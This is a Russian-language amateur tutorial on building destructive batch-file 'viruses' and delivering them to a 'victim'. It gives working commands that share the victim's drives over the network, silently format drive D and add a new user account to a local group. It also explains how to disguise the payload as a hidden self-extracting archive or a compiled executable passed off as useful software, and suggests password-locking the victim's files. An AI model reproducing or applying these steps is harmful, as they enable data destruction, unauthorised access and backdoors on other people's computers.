Нечем мне заняться сегодня вечерком . Вот и решил я написать несколько простейших DOS программ.

Для написания этих програм нам понадобяться :

1. руки
2. Стандартное приложение OS windows (блокнот)
3. Quick Batch File Compiler
4. WinRAR
5. Exel
- - - - - - - - - - - - - - - - - - - - - - - - - - - - -

сначала создадим блокнот . Сохраним его с расширением .BAT (например Proba.BAT) после этого жмем правой кнопкой изменить .
Открылся блокнот , теперь можем преступить к написанию тела вируса ...

Мы сразу должны назначить себе цель написания программы . Мы можем гронуть всю систему , Открыть общий доступ к локальному диску
создать новую учетную запись .

для начала остановимся на программе которая откроет доступ к локальному диску .
тело вируса представляет собой строки :

@Echo off
net share disk_d=d: > nul
net share disk_c=c: > nul

этим действием мы откроем общий доступ к диску С и D . Но мы не знаем точно как обознначен локальный диск у жертвы , поэтому я
сделаю следующее :
@Echo off
net share disk_d=d: > nul
net share disk_c=c: > nul
net share disk_x=x: > nul
net share disk_y=y: > nul
net share disk_z=z: > nul
net share disk_f=f: > nul

пожалуй хватит , этим действием мы расшарили диски D,C,X ,Y,Z,F.

далее мы можем поступить двумя способами :

1. мы можем взять архиватор WINRAR и сделать следущее :

1) Выбираешь метод сжатия - максимальный.
2) Ставишь пимпу напротив "создать sfx архив". Этим ты превратишь свой батник в exe файл =)
3) Переходишь на вкладку "Дополнительно" - "Параметры SFX"
4) Во вкладке "Общие" пишешь путь распаковки твоего батника, например если хочешь кинуть его в C:/WINDOWS пишешь %windir%
5)Указываешь имя своего батника (например shara.bat) в "запустить ПОСЛЕ распаковки".
6) Переходишь на вкладку "Режимы" и ставишь точки напротив "Скрыть все" и "Перезаписывать все файлы".
7) На вкладке "Текст и значок" указываешь иконку будущего exe файла.
8) тыкаешь OK.

2. Копируем тело вируса в Quick Batch File Compiler , выбираем иконку , и передаем её жертве на компьютер выдавая её за новый
очень полезный софт .

Всем этим я занимался в локальной сети , передаваал файлы при помощи файлообменника или IRC .

Следующая строка может грохнуть всю систему !!!

@Echo off
format d: /q /y > nul

тело этого вируса форматнет локальный диск D , при наличии мозгов можно дописать пару строк с возможным именем локального диска .

После внедрения на чужой компьютер мы можем заменить вышеописаный вирус вместо любой важной программы , скопировать
папку с популярным клиентом ICQ , Заархивировать все файлы и поставить на них пароль =) (он должен быть подлиннее )
.Ваши действия ограничены только вашей фантазией =)

теперь я хочу создать учетную запись у Жертвы . мы можем войти в его систему как удалённо так и на прямую

NET USER <Login> <PASS> /add (писать без <>)
добавляем созданную учётную запись в указанную локальную группу
NET LOCALGROUP <Имя группы> <Login> /add (писать без <>)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -